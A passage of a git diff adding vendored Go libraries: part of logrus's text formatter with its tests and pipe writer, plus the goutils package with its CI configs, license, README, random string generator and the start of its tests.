+	if isColored {
+		f.printColored(b, entry, keys, timestampFormat)
+	} else {
+		if !f.DisableTimestamp {
+			f.appendKeyValue(b, "time", entry.Time.Format(timestampFormat))
+		}
+		f.appendKeyValue(b, "level", entry.Level.String())
+		if entry.Message != "" {
+			f.appendKeyValue(b, "msg", entry.Message)
+		}
+		for _, key := range keys {
+			f.appendKeyValue(b, key, entry.Data[key])
+		}
+	}
+
+	b.WriteByte('\n')
+	return b.Bytes(), nil
+}
+
+func (f *TextFormatter) printColored(b *bytes.Buffer, entry *Entry, keys []string, timestampFormat string) {
+	var levelColor int
+	switch entry.Level {
+	case DebugLevel:
+		levelColor = gray
+	case WarnLevel:
+		levelColor = yellow
+	case ErrorLevel, FatalLevel, PanicLevel:
+		levelColor = red
+	default:
+		levelColor = blue
+	}
+
+	levelText := strings.ToUpper(entry.Level.String())[0:4]
+
+	if f.DisableTimestamp {
+		fmt.Fprintf(b, "\x1b[%dm%s\x1b[0m %-44s ", levelColor, levelText, entry.Message)
+	} else if !f.FullTimestamp {
+		fmt.Fprintf(b, "\x1b[%dm%s\x1b[0m[%04d] %-44s ", levelColor, levelText, int(entry.Time.Sub(baseTimestamp)/time.Second), entry.Message)
+	} else {
+		fmt.Fprintf(b, "\x1b[%dm%s\x1b[0m[%s] %-44s ", levelColor, levelText, entry.Time.Format(timestampFormat), entry.Message)
+	}
+	for _, k := range keys {
+		v := entry.Data[k]
+		fmt.Fprintf(b, " \x1b[%dm%s\x1b[0m=", levelColor, k)
+		f.appendValue(b, v)
+	}
+}
+
+func (f *TextFormatter) needsQuoting(text string) bool {
+	if f.QuoteEmptyFields && len(text) == 0 {
+		return true
+	}
+	for _, ch := range text {
+		if !((ch >= 'a' && ch <= 'z') ||
+			(ch >= 'A' && ch <= 'Z') ||
+			(ch >= '0' && ch <= '9') ||
+			ch == '-' || ch == '.' || ch == '_' || ch == '/' || ch == '@' || ch == '^' || ch == '+') {
+			return true
+		}
+	}
+	return false
+}
+
+func (f *TextFormatter) appendKeyValue(b *bytes.Buffer, key string, value interface{}) {
+	if b.Len() > 0 {
+		b.WriteByte(' ')
+	}
+	b.WriteString(key)
+	b.WriteByte('=')
+	f.appendValue(b, value)
+}
+
+func (f *TextFormatter) appendValue(b *bytes.Buffer, value interface{}) {
+	stringVal, ok := value.(string)
+	if !ok {
+		stringVal = fmt.Sprint(value)
+	}
+
+	if !f.needsQuoting(stringVal) {
+		b.WriteString(stringVal)
+	} else {
+		b.WriteString(fmt.Sprintf("%q", stringVal))
+	}
+}
diff --git a/vendor/github.com/Sirupsen/logrus/text_formatter_test.go b/vendor/github.com/Sirupsen/logrus/text_formatter_test.go
new file mode 100644
index 0000000000..d93b931e51
--- /dev/null
+++ b/vendor/github.com/Sirupsen/logrus/text_formatter_test.go
@@ -0,0 +1,141 @@
+package logrus
+
+import (
+	"bytes"
+	"errors"
+	"fmt"
+	"strings"
+	"testing"
+	"time"
+)
+
+func TestFormatting(t *testing.T) {
+	tf := &TextFormatter{DisableColors: true}
+
+	testCases := []struct {
+		value    string
+		expected string
+	}{
+		{`foo`, "time=\"0001-01-01T00:00:00Z\" level=panic test=foo\n"},
+	}
+
+	for _, tc := range testCases {
+		b, _ := tf.Format(WithField("test", tc.value))
+
+		if string(b) != tc.expected {
+			t.Errorf("formatting expected for %q (result was %q instead of %q)", tc.value, string(b), tc.expected)
+		}
+	}
+}
+
+func TestQuoting(t *testing.T) {
+	tf := &TextFormatter{DisableColors: true}
+
+	checkQuoting := func(q bool, value interface{}) {
+		b, _ := tf.Format(WithField("test", value))
+		idx := bytes.Index(b, ([]byte)("test="))
+		cont := bytes.Contains(b[idx+5:], []byte("\""))
+		if cont != q {
+			if q {
+				t.Errorf("quoting expected for: %#v", value)
+			} else {
+				t.Errorf("quoting not expected for: %#v", value)
+			}
+		}
+	}
+
+	checkQuoting(false, "")
+	checkQuoting(false, "abcd")
+	checkQuoting(false, "v1.0")
+	checkQuoting(false, "1234567890")
+	checkQuoting(false, "/foobar")
+	checkQuoting(false, "foo_bar")
+	checkQuoting(false, "foo@bar")
+	checkQuoting(false, "foobar^")
+	checkQuoting(false, "+/-_^@f.oobar")
+	checkQuoting(true, "foobar$")
+	checkQuoting(true, "&foobar")
+	checkQuoting(true, "x y")
+	checkQuoting(true, "x,y")
+	checkQuoting(false, errors.New("invalid"))
+	checkQuoting(true, errors.New("invalid argument"))
+
+	// Test for quoting empty fields.
+	tf.QuoteEmptyFields = true
+	checkQuoting(true, "")
+	checkQuoting(false, "abcd")
+	checkQuoting(true, errors.New("invalid argument"))
+}
+
+func TestEscaping(t *testing.T) {
+	tf := &TextFormatter{DisableColors: true}
+
+	testCases := []struct {
+		value    string
+		expected string
+	}{
+		{`ba"r`, `ba\"r`},
+		{`ba'r`, `ba'r`},
+	}
+
+	for _, tc := range testCases {
+		b, _ := tf.Format(WithField("test", tc.value))
+		if !bytes.Contains(b, []byte(tc.expected)) {
+			t.Errorf("escaping expected for %q (result was %q instead of %q)", tc.value, string(b), tc.expected)
+		}
+	}
+}
+
+func TestEscaping_Interface(t *testing.T) {
+	tf := &TextFormatter{DisableColors: true}
+
+	ts := time.Now()
+
+	testCases := []struct {
+		value    interface{}
+		expected string
+	}{
+		{ts, fmt.Sprintf("\"%s\"", ts.String())},
+		{errors.New("error: something went wrong"), "\"error: something went wrong\""},
+	}
+
+	for _, tc := range testCases {
+		b, _ := tf.Format(WithField("test", tc.value))
+		if !bytes.Contains(b, []byte(tc.expected)) {
+			t.Errorf("escaping expected for %q (result was %q instead of %q)", tc.value, string(b), tc.expected)
+		}
+	}
+}
+
+func TestTimestampFormat(t *testing.T) {
+	checkTimeStr := func(format string) {
+		customFormatter := &TextFormatter{DisableColors: true, TimestampFormat: format}
+		customStr, _ := customFormatter.Format(WithField("test", "test"))
+		timeStart := bytes.Index(customStr, ([]byte)("time="))
+		timeEnd := bytes.Index(customStr, ([]byte)("level="))
+		timeStr := customStr[timeStart+5+len("\"") : timeEnd-1-len("\"")]
+		if format == "" {
+			format = time.RFC3339
+		}
+		_, e := time.Parse(format, (string)(timeStr))
+		if e != nil {
+			t.Errorf("time string \"%s\" did not match provided time format \"%s\": %s", timeStr, format, e)
+		}
+	}
+
+	checkTimeStr("2006-01-02T15:04:05.000000000Z07:00")
+	checkTimeStr("Mon Jan _2 15:04:05 2006")
+	checkTimeStr("")
+}
+
+func TestDisableTimestampWithColoredOutput(t *testing.T) {
+	tf := &TextFormatter{DisableTimestamp: true, ForceColors: true}
+
+	b, _ := tf.Format(WithField("test", "test"))
+	if strings.Contains(string(b), "[0000]") {
+		t.Error("timestamp not expected when DisableTimestamp is true")
+	}
+}
+
+// TODO add tests for sorting etc., this requires a parser for the text
+// formatter output.
diff --git a/vendor/github.com/Sirupsen/logrus/writer.go b/vendor/github.com/Sirupsen/logrus/writer.go
new file mode 100644
index 0000000000..7bdebedc60
--- /dev/null
+++ b/vendor/github.com/Sirupsen/logrus/writer.go
@@ -0,0 +1,62 @@
+package logrus
+
+import (
+	"bufio"
+	"io"
+	"runtime"
+)
+
+func (logger *Logger) Writer() *io.PipeWriter {
+	return logger.WriterLevel(InfoLevel)
+}
+
+func (logger *Logger) WriterLevel(level Level) *io.PipeWriter {
+	return NewEntry(logger).WriterLevel(level)
+}
+
+func (entry *Entry) Writer() *io.PipeWriter {
+	return entry.WriterLevel(InfoLevel)
+}
+
+func (entry *Entry) WriterLevel(level Level) *io.PipeWriter {
+	reader, writer := io.Pipe()
+
+	var printFunc func(args ...interface{})
+
+	switch level {
+	case DebugLevel:
+		printFunc = entry.Debug
+	case InfoLevel:
+		printFunc = entry.Info
+	case WarnLevel:
+		printFunc = entry.Warn
+	case ErrorLevel:
+		printFunc = entry.Error
+	case FatalLevel:
+		printFunc = entry.Fatal
+	case PanicLevel:
+		printFunc = entry.Panic
+	default:
+		printFunc = entry.Print
+	}
+
+	go entry.writerScanner(reader, printFunc)
+	runtime.SetFinalizer(writer, writerFinalizer)
+
+	return writer
+}
+
+func (entry *Entry) writerScanner(reader *io.PipeReader, printFunc func(args ...interface{})) {
+	scanner := bufio.NewScanner(reader)
+	for scanner.Scan() {
+		printFunc(scanner.Text())
+	}
+	if err := scanner.Err(); err != nil {
+		entry.Errorf("Error while reading from Writer: %s", err)
+	}
+	reader.Close()
+}
+
+func writerFinalizer(writer *io.PipeWriter) {
+	writer.Close()
+}
diff --git a/vendor/github.com/aokoli/goutils/.travis.yml b/vendor/github.com/aokoli/goutils/.travis.yml
new file mode 100644
index 0000000000..4025e01ec4
--- /dev/null
+++ b/vendor/github.com/aokoli/goutils/.travis.yml
@@ -0,0 +1,18 @@
+language: go
+
+go:
+  - 1.6
+  - 1.7
+  - 1.8
+  - tip
+
+script:
+  - go test -v
+
+notifications:
+  webhooks:
+    urls:
+      - https://webhooks.gitter.im/e/06e3328629952dabe3e0
+    on_success: change  # options: [always|never|change] default: always
+    on_failure: always  # options: [always|never|change] default: always
+    on_start: never     # options: [always|never|change] default: always
diff --git a/vendor/github.com/aokoli/goutils/CHANGELOG.md b/vendor/github.com/aokoli/goutils/CHANGELOG.md
new file mode 100644
index 0000000000..d700ec47f2
--- /dev/null
+++ b/vendor/github.com/aokoli/goutils/CHANGELOG.md
@@ -0,0 +1,8 @@
+# 1.0.1 (2017-05-31)
+
+## Fixed
+- #21: Fix generation of alphanumeric strings (thanks @dbarranco)
+
+# 1.0.0 (2014-04-30)
+
+- Initial release.
diff --git a/vendor/github.com/aokoli/goutils/LICENSE.txt b/vendor/github.com/aokoli/goutils/LICENSE.txt
new file mode 100644
index 0000000000..d645695673
--- /dev/null
+++ b/vendor/github.com/aokoli/goutils/LICENSE.txt
@@ -0,0 +1,202 @@
+
+                                 Apache License
+                           Version 2.0, January 2004
+                        http://www.apache.org/licenses/
+
+   TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
+
+   1. Definitions.
+
+      "License" shall mean the terms and conditions for use, reproduction,
+      and distribution as defined by Sections 1 through 9 of this document.
+
+      "Licensor" shall mean the copyright owner or entity authorized by
+      the copyright owner that is granting the License.
+
+      "Legal Entity" shall mean the union of the acting entity and all
+      other entities that control, are controlled by, or are under common
+      control with that entity. For the purposes of this definition,
+      "control" means (i) the power, direct or indirect, to cause the
+      direction or management of such entity, whether by contract or
+      otherwise, or (ii) ownership of fifty percent (50%) or more of the
+      outstanding shares, or (iii) beneficial ownership of such entity.
+
+      "You" (or "Your") shall mean an individual or Legal Entity
+      exercising permissions granted by this License.
+
+      "Source" form shall mean the preferred form for making modifications,
+      including but not limited to software source code, documentation
+      source, and configuration files.
+
+      "Object" form shall mean any form resulting from mechanical
+      transformation or translation of a Source form, including but
+      not limited to compiled object code, generated documentation,
+      and conversions to other media types.
+
+      "Work" shall mean the work of authorship, whether in Source or
+      Object form, made available under the License, as indicated by a
+      copyright notice that is included in or attached to the work
+      (an example is provided in the Appendix below).
+
+      "Derivative Works" shall mean any work, whether in Source or Object
+      form, that is based on (or derived from) the Work and for which the
+      editorial revisions, annotations, elaborations, or other modifications
+      represent, as a whole, an original work of authorship. For the purposes
+      of this License, Derivative Works shall not include works that remain
+      separable from, or merely link (or bind by name) to the interfaces of,
+      the Work and Derivative Works thereof.
+
+      "Contribution" shall mean any work of authorship, including
+      the original version of the Work and any modifications or additions
+      to that Work or Derivative Works thereof, that is intentionally
+      submitted to Licensor for inclusion in the Work by the copyright owner
+      or by an individual or Legal Entity authorized to submit on behalf of
+      the copyright owner. For the purposes of this definition, "submitted"
+      means any form of electronic, verbal, or written communication sent
+      to the Licensor or its representatives, including but not limited to
+      communication on electronic mailing lists, source code control systems,
+      and issue tracking systems that are managed by, or on behalf of, the
+      Licensor for the purpose of discussing and improving the Work, but
+      excluding communication that is conspicuously marked or otherwise
+      designated in writing by the copyright owner as "Not a Contribution."
+
+      "Contributor" shall mean Licensor and any individual or Legal Entity
+      on behalf of whom a Contribution has been received by Licensor and
+      subsequently incorporated within the Work.
+
+   2. Grant of Copyright License. Subject to the terms and conditions of
+      this License, each Contributor hereby grants to You a perpetual,
+      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
+      copyright license to reproduce, prepare Derivative Works of,
+      publicly display, publicly perform, sublicense, and distribute the
+      Work and such Derivative Works in Source or Object form.
+
+   3. Grant of Patent License. Subject to the terms and conditions of
+      this License, each Contributor hereby grants to You a perpetual,
+      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
+      (except as stated in this section) patent license to make, have made,
+      use, offer to sell, sell, import, and otherwise transfer the Work,
+      where such license applies only to those patent claims licensable
+      by such Contributor that are necessarily infringed by their
+      Contribution(s) alone or by combination of their Contribution(s)
+      with the Work to which such Contribution(s) was submitted. If You
+      institute patent litigation against any entity (including a
+      cross-claim or counterclaim in a lawsuit) alleging that the Work
+      or a Contribution incorporated within the Work constitutes direct
+      or contributory patent infringement, then any patent licenses
+      granted to You under this License for that Work shall terminate
+      as of the date such litigation is filed.
+
+   4. Redistribution. You may reproduce and distribute copies of the
+      Work or Derivative Works thereof in any medium, with or without
+      modifications, and in Source or Object form, provided that You
+      meet the following conditions:
+
+      (a) You must give any other recipients of the Work or
+          Derivative Works a copy of this License; and
+
+      (b) You must cause any modified files to carry prominent notices
+          stating that You changed the files; and
+
+      (c) You must retain, in the Source form of any Derivative Works
+          that You distribute, all copyright, patent, trademark, and
+          attribution notices from the Source form of the Work,
+          excluding those notices that do not pertain to any part of
+          the Derivative Works; and
+
+      (d) If the Work includes a "NOTICE" text file as part of its
+          distribution, then any Derivative Works that You distribute must
+          include a readable copy of the attribution notices contained
+          within such NOTICE file, excluding those notices that do not
+          pertain to any part of the Derivative Works, in at least one
+          of the following places: within a NOTICE text file distributed
+          as part of the Derivative Works; within the Source form or
+          documentation, if provided along with the Derivative Works; or,
+          within a display generated by the Derivative Works, if and
+          wherever such third-party notices normally appear. The contents
+          of the NOTICE file are for informational purposes only and
+          do not modify the License. You may add Your own attribution
+          notices within Derivative Works that You distribute, alongside
+          or as an addendum to the NOTICE text from the Work, provided
+          that such additional attribution notices cannot be construed
+          as modifying the License.
+
+      You may add Your own copyright statement to Your modifications and
+      may provide additional or different license terms and conditions
+      for use, reproduction, or distribution of Your modifications, or
+      for any such Derivative Works as a whole, provided Your use,
+      reproduction, and distribution of the Work otherwise complies with
+      the conditions stated in this License.
+
+   5. Submission of Contributions. Unless You explicitly state otherwise,
+      any Contribution intentionally submitted for inclusion in the Work
+      by You to the Licensor shall be under the terms and conditions of
+      this License, without any additional terms or conditions.
+      Notwithstanding the above, nothing herein shall supersede or modify
+      the terms of any separate license agreement you may have executed
+      with Licensor regarding such Contributions.
+
+   6. Trademarks. This License does not grant permission to use the trade
+      names, trademarks, service marks, or product names of the Licensor,
+      except as required for reasonable and customary use in describing the
+      origin of the Work and reproducing the content of the NOTICE file.
+
+   7. Disclaimer of Warranty. Unless required by applicable law or
+      agreed to in writing, Licensor provides the Work (and each
+      Contributor provides its Contributions) on an "AS IS" BASIS,
+      WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
+      implied, including, without limitation, any warranties or conditions
+      of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
+      PARTICULAR PURPOSE. You are solely responsible for determining the
+      appropriateness of using or redistributing the Work and assume any
+      risks associated with Your exercise of permissions under this License.
+
+   8. Limitation of Liability. In no event and under no legal theory,
+      whether in tort (including negligence), contract, or otherwise,
+      unless required by applicable law (such as deliberate and grossly
+      negligent acts) or agreed to in writing, shall any Contributor be
+      liable to You for damages, including any direct, indirect, special,
+      incidental, or consequential damages of any character arising as a
+      result of this License or out of the use or inability to use the
+      Work (including but not limited to damages for loss of goodwill,
+      work stoppage, computer failure or malfunction, or any and all
+      other commercial damages or losses), even if such Contributor
+      has been advised of the possibility of such damages.
+
+   9. Accepting Warranty or Additional Liability. While redistributing
+      the Work or Derivative Works thereof, You may choose to offer,
+      and charge a fee for, acceptance of support, warranty, indemnity,
+      or other liability obligations and/or rights consistent with this
+      License. However, in accepting such obligations, You may act only
+      on Your own behalf and on Your sole responsibility, not on behalf
+      of any other Contributor, and only if You agree to indemnify,
+      defend, and hold each Contributor harmless for any liability
+      incurred by, or claims asserted against, such Contributor by reason
+      of your accepting any such warranty or additional liability.
+
+   END OF TERMS AND CONDITIONS
+
+   APPENDIX: How to apply the Apache License to your work.
+
+      To apply the Apache License to your work, attach the following
+      boilerplate notice, with the fields enclosed by brackets "[]"
+      replaced with your own identifying information. (Don't include
+      the brackets!)  The text should be enclosed in the appropriate
+      comment syntax for the file format. We also recommend that a
+      file or class name and description of purpose be included on the
+      same "printed page" as the copyright notice for easier
+      identification within third-party archives.
+
+   Copyright [yyyy] [name of copyright owner]
+
+   Licensed under the Apache License, Version 2.0 (the "License");
+   you may not use this file except in compliance with the License.
+   You may obtain a copy of the License at
+
+       http://www.apache.org/licenses/LICENSE-2.0
+
+   Unless required by applicable law or agreed to in writing, software
+   distributed under the License is distributed on an "AS IS" BASIS,
+   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+   See the License for the specific language governing permissions and
+   limitations under the License.
diff --git a/vendor/github.com/aokoli/goutils/README.md b/vendor/github.com/aokoli/goutils/README.md
new file mode 100644
index 0000000000..163ffe72a8
--- /dev/null
+++ b/vendor/github.com/aokoli/goutils/README.md
@@ -0,0 +1,70 @@
+GoUtils
+===========
+[![Stability: Maintenance](https://masterminds.github.io/stability/maintenance.svg)](https://masterminds.github.io/stability/maintenance.html)
+[![GoDoc](https://godoc.org/github.com/Masterminds/goutils?status.png)](https://godoc.org/github.com/Masterminds/goutils) [![Build Status](https://travis-ci.org/Masterminds/goutils.svg?branch=master)](https://travis-ci.org/Masterminds/goutils) [![Build status](https://ci.appveyor.com/api/projects/status/sc2b1ew0m7f0aiju?svg=true)](https://ci.appveyor.com/project/mattfarina/goutils)
+
+
+GoUtils provides users with utility functions to manipulate strings in various ways. It is a Go implementation of some
+string manipulation libraries of Java Apache Commons. GoUtils includes the following Java Apache Commons classes:
+* WordUtils    
+* RandomStringUtils  
+* StringUtils (partial implementation)
+
+## Installation
+If you have Go set up on your system, from the GOPATH directory within the command line/terminal, enter this:
+
+	go get github.com/Masterminds/goutils
+
+If you do not have Go set up on your system, please follow the [Go installation directions from the documenation](http://golang.org/doc/install), and then follow the instructions above to install GoUtils.
+
+
+## Documentation
+GoUtils doc is available here: [![GoDoc](https://godoc.org/github.com/Masterminds/goutils?status.png)](https://godoc.org/github.com/Masterminds/goutils)
+
+
+## Usage
+The code snippets below show examples of how to use GoUtils. Some functions return errors while others do not. The first instance below, which does not return an error, is the `Initials` function (located within the `wordutils.go` file).
+
+    package main
+
+    import (
+        "fmt"
+    	"github.com/Masterminds/goutils"
+    )
+
+    func main() {
+
+    	// EXAMPLE 1: A goutils function which returns no errors
+        fmt.Println (goutils.Initials("John Doe Foo")) // Prints out "JDF"
+
+    }
+Some functions return errors mainly due to illegal arguements used as parameters. The code example below illustrates how to deal with function that returns an error. In this instance, the function is the `Random` function (located within the `randomstringutils.go` file).
+
+    package main
+
+    import (
+        "fmt"
+        "github.com/Masterminds/goutils"
+    )
+
+    func main() {
+
+        // EXAMPLE 2: A goutils function which returns an error
+        rand1, err1 := goutils.Random (-1, 0, 0, true, true)  
+
+        if err1 != nil {
+			fmt.Println(err1) // Prints out error message because -1 was entered as the first parameter in goutils.Random(...)
+		} else {
+			fmt.Println(rand1)
+		}
+
+    }
+
+## License
+GoUtils is licensed under the Apache License, Version 2.0. Please check the LICENSE.txt file or visit http://www.apache.org/licenses/LICENSE-2.0 for a copy of the license.
+
+## Issue Reporting
+Make suggestions or report issues using the Git issue tracker: https://github.com/Masterminds/goutils/issues
+
+## Website
+* [GoUtils webpage](http://Masterminds.github.io/goutils/)
diff --git a/vendor/github.com/aokoli/goutils/appveyor.yml b/vendor/github.com/aokoli/goutils/appveyor.yml
new file mode 100644
index 0000000000..657564a847
--- /dev/null
+++ b/vendor/github.com/aokoli/goutils/appveyor.yml
@@ -0,0 +1,21 @@
+version: build-{build}.{branch}
+
+clone_folder: C:\gopath\src\github.com\Masterminds\goutils
+shallow_clone: true
+
+environment:
+  GOPATH: C:\gopath
+
+platform:
+  - x64
+
+build: off
+
+install:
+  - go version
+  - go env
+
+test_script:
+  - go test -v
+
+deploy: off
diff --git a/vendor/github.com/aokoli/goutils/randomstringutils.go b/vendor/github.com/aokoli/goutils/randomstringutils.go
new file mode 100644
index 0000000000..1364e0cafd
--- /dev/null
+++ b/vendor/github.com/aokoli/goutils/randomstringutils.go
@@ -0,0 +1,268 @@
+/*
+Copyright 2014 Alexander Okoli
+
+Licensed under the Apache License, Version 2.0 (the "License");
+you may not use this file except in compliance with the License.
+You may obtain a copy of the License at
+
+    http://www.apache.org/licenses/LICENSE-2.0
+
+Unless required by applicable law or agreed to in writing, software
+distributed under the License is distributed on an "AS IS" BASIS,
+WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+See the License for the specific language governing permissions and
+limitations under the License.
+*/
+
+package goutils
+
+import (
+	"fmt"
+	"math"
+	"math/rand"
+	"regexp"
+	"time"
+	"unicode"
+)
+
+// RANDOM provides the time-based seed used to generate random numbers
+var RANDOM = rand.New(rand.NewSource(time.Now().UnixNano()))
+
+/*
+RandomNonAlphaNumeric creates a random string whose length is the number of characters specified.
+Characters will be chosen from the set of all characters (ASCII/Unicode values between 0 to 2,147,483,647 (math.MaxInt32)).
+
+Parameter:
+	count - the length of random string to create
+
+Returns:
+	string - the random string
+	error - an error stemming from an invalid parameter within underlying function, RandomSeed(...)
+*/
+func RandomNonAlphaNumeric(count int) (string, error) {
+	return RandomAlphaNumericCustom(count, false, false)
+}
+
+/*
+RandomAscii creates a random string whose length is the number of characters specified.
+Characters will be chosen from the set of characters whose ASCII value is between 32 and 126 (inclusive).
+
+Parameter:
+	count - the length of random string to create
+
+Returns:
+	string - the random string
+	error - an error stemming from an invalid parameter within underlying function, RandomSeed(...)
+*/
+func RandomAscii(count int) (string, error) {
+	return Random(count, 32, 127, false, false)
+}
+
+/*
+RandomNumeric creates a random string whose length is the number of characters specified.
+Characters will be chosen from the set of numeric characters.
+
+Parameter:
+	count - the length of random string to create
+
+Returns:
+	string - the random string
+	error - an error stemming from an invalid parameter within underlying function, RandomSeed(...)
+*/
+func RandomNumeric(count int) (string, error) {
+	return Random(count, 0, 0, false, true)
+}
+
+/*
+RandomAlphabetic creates a random string whose length is the number of characters specified.
+Characters will be chosen from the set of alpha-numeric characters as indicated by the arguments.
+
+Parameters:
+	count - the length of random string to create
+	letters - if true, generated string may include alphabetic characters
+	numbers - if true, generated string may include numeric characters
+
+Returns:
+	string - the random string
+	error - an error stemming from an invalid parameter within underlying function, RandomSeed(...)
+*/
+func RandomAlphabetic(count int) (string, error) {
+	return Random(count, 0, 0, true, false)
+}
+
+/*
+RandomAlphaNumeric creates a random string whose length is the number of characters specified.
+Characters will be chosen from the set of alpha-numeric characters.
+
+Parameter:
+	count - the length of random string to create
+
+Returns:
+	string - the random string
+	error - an error stemming from an invalid parameter within underlying function, RandomSeed(...)
+*/
+func RandomAlphaNumeric(count int) (string, error) {
+	RandomString, err := Random(count, 0, 0, true, true)
+	if err != nil {
+		return "", fmt.Errorf("Error: %s", err)
+	}
+	match, err := regexp.MatchString("([0-9]+)", RandomString)
+	if err != nil {
+		panic(err)
+	}
+
+	if !match {
+		//Get the position between 0 and the length of the string-1  to insert a random number
+		position := rand.Intn(count)
+		//Insert a random number between [0-9] in the position
+		RandomString = RandomString[:position] + string('0'+rand.Intn(10)) + RandomString[position+1:]
+		return RandomString, err
+	}
+	return RandomString, err
+
+}
+
+/*
+RandomAlphaNumericCustom creates a random string whose length is the number of characters specified.
+Characters will be chosen from the set of alpha-numeric characters as indicated by the arguments.
+
+Parameters:
+	count - the length of random string to create
+	letters - if true, generated string may include alphabetic characters
+	numbers - if true, generated string may include numeric characters
+
+Returns:
+	string - the random string
+	error - an error stemming from an invalid parameter within underlying function, RandomSeed(...)
+*/
+func RandomAlphaNumericCustom(count int, letters bool, numbers bool) (string, error) {
+	return Random(count, 0, 0, letters, numbers)
+}
+
+/*
+Random creates a random string based on a variety of options, using default source of randomness.
+This method has exactly the same semantics as RandomSeed(int, int, int, bool, bool, []char, *rand.Rand), but
+instead of using an externally supplied source of randomness, it uses the internal *rand.Rand instance.
+
+Parameters:
+	count - the length of random string to create
+	start - the position in set of chars (ASCII/Unicode int) to start at
+	end - the position in set of chars (ASCII/Unicode int) to end before
+	letters - if true, generated string may include alphabetic characters
+	numbers - if true, generated string may include numeric characters
+	chars - the set of chars to choose randoms from. If nil, then it will use the set of all chars.
+
+Returns:
+	string - the random string
+	error - an error stemming from an invalid parameter within underlying function, RandomSeed(...)
+*/
+func Random(count int, start int, end int, letters bool, numbers bool, chars ...rune) (string, error) {
+	return RandomSeed(count, start, end, letters, numbers, chars, RANDOM)
+}
+
+/*
+RandomSeed creates a random string based on a variety of options, using supplied source of randomness.
+If the parameters start and end are both 0, start and end are set to ' ' and 'z', the ASCII printable characters, will be used,
+unless letters and numbers are both false, in which case, start and end are set to 0 and math.MaxInt32, respectively.
+If chars is not nil, characters stored in chars that are between start and end are chosen.
+This method accepts a user-supplied *rand.Rand instance to use as a source of randomness. By seeding a single *rand.Rand instance
+with a fixed seed and using it for each call, the same random sequence of strings can be generated repeatedly and predictably.
+
+Parameters:
+	count - the length of random string to create
+	start - the position in set of chars (ASCII/Unicode decimals) to start at
+	end - the position in set of chars (ASCII/Unicode decimals) to end before
+	letters - if true, generated string may include alphabetic characters
+	numbers - if true, generated string may include numeric characters
+	chars - the set of chars to choose randoms from. If nil, then it will use the set of all chars.
+	random - a source of randomness.
+
+Returns:
+	string - the random string
+	error - an error stemming from invalid parameters: if count < 0; or the provided chars array is empty; or end <= start; or end > len(chars)
+*/
+func RandomSeed(count int, start int, end int, letters bool, numbers bool, chars []rune, random *rand.Rand) (string, error) {
+
+	if count == 0 {
+		return "", nil
+	} else if count < 0 {
+		err := fmt.Errorf("randomstringutils illegal argument: Requested random string length %v is less than 0.", count) // equiv to err := errors.New("...")
+		return "", err
+	}
+	if chars != nil && len(chars) == 0 {
+		err := fmt.Errorf("randomstringutils illegal argument: The chars array must not be empty")
+		return "", err
+	}
+
+	if start == 0 && end == 0 {
+		if chars != nil {
+			end = len(chars)
+		} else {
+			if !letters && !numbers {
+				end = math.MaxInt32
+			} else {
+				end = 'z' + 1
+				start = ' '
+			}
+		}
+	} else {
+		if end <= start {
+			err := fmt.Errorf("randomstringutils illegal argument: Parameter end (%v) must be greater than start (%v)", end, start)
+			return "", err
+		}
+
+		if chars != nil && end > len(chars) {
+			err := fmt.Errorf("randomstringutils illegal argument: Parameter end (%v) cannot be greater than len(chars) (%v)", end, len(chars))
+			return "", err
+		}
+	}
+
+	buffer := make([]rune, count)
+	gap := end - start
+
+	// high-surrogates range, (\uD800-\uDBFF) = 55296 - 56319
+	//  low-surrogates range, (\uDC00-\uDFFF) = 56320 - 57343
+
+	for count != 0 {
+		count--
+		var ch rune
+		if chars == nil {
+			ch = rune(random.Intn(gap) + start)
+		} else {
+			ch = chars[random.Intn(gap)+start]
+		}
+
+		if letters && unicode.IsLetter(ch) || numbers && unicode.IsDigit(ch) || !letters && !numbers {
+			if ch >= 56320 && ch <= 57343 { // low surrogate range
+				if count == 0 {
+					count++
+				} else {
+					// Insert low surrogate
+					buffer[count] = ch
+					count--
+					// Insert high surrogate
+					buffer[count] = rune(55296 + random.Intn(128))
+				}
+			} else if ch >= 55296 && ch <= 56191 { // High surrogates range (Partial)
+				if count == 0 {
+					count++
+				} else {
+					// Insert low surrogate
+					buffer[count] = rune(56320 + random.Intn(128))
+					count--
+					// Insert high surrogate
+					buffer[count] = ch
+				}
+			} else if ch >= 56192 && ch <= 56319 {
+				// private high surrogate, skip it
+				count++
+			} else {
+				// not one of the surrogates*
+				buffer[count] = ch
+			}
+		} else {
+			count++
+		}
+	}
+	return string(buffer), nil
+}
diff --git a/vendor/github.com/aokoli/goutils/randomstringutils_test.go b/vendor/github.com/aokoli/goutils/randomstringutils_test.go
new file mode 100644
index 0000000000..b990654a1c
--- /dev/null
+++ b/vendor/github.com/aokoli/goutils/randomstringutils_test.go
@@ -0,0 +1,78 @@
+package goutils
+
+import (
+	"fmt"
+	"math/rand"
+	"testing"
+)
+
+// ****************************** TESTS ********************************************
+
+func TestRandomSeed(t *testing.T) {
+
+	// count, start, end, letters, numbers := 5, 0, 0, true, true
+	random := rand.New(rand.NewSource(10))
+	out := "3ip9v"
+
+	// Test 1: Simulating RandomAlphaNumeric(count int)
+	if x, _ := RandomSeed(5, 0, 0, true, true, nil, random); x != out {
+		t.Errorf("RandomSeed(%v, %v, %v, %v, %v, %v, %v) = %v, want %v", 5, 0, 0, true, true, nil, random, x, out)
+	}
+
+	// Test 2: Simulating RandomAlphabetic(count int)
+	out = "MBrbj"
+
+	if x, _ := RandomSeed(5, 0, 0, true, false, nil, random); x != out {
+		t.Errorf("RandomSeed(%v, %v, %v, %v, %v, %v, %v) = %v, want %v", 5, 0, 0, true, false, nil, random, x, out)
+	}
+
+	// Test 3: Simulating RandomNumeric(count int)
+	out = "88935"
+
+	if x, _ := RandomSeed(5, 0, 0, false, true, nil, random); x != out {
+		t.Errorf("RandomSeed(%v, %v, %v, %v, %v, %v, %v) = %v, want %v", 5, 0, 0, false, true, nil, random, x, out)
+	}
+
+	// Test 4: Simulating RandomAscii(count int)
+	out = "H_I;E"
+
+	if x, _ := RandomSeed(5, 32, 127, false, false, nil, random); x != out {
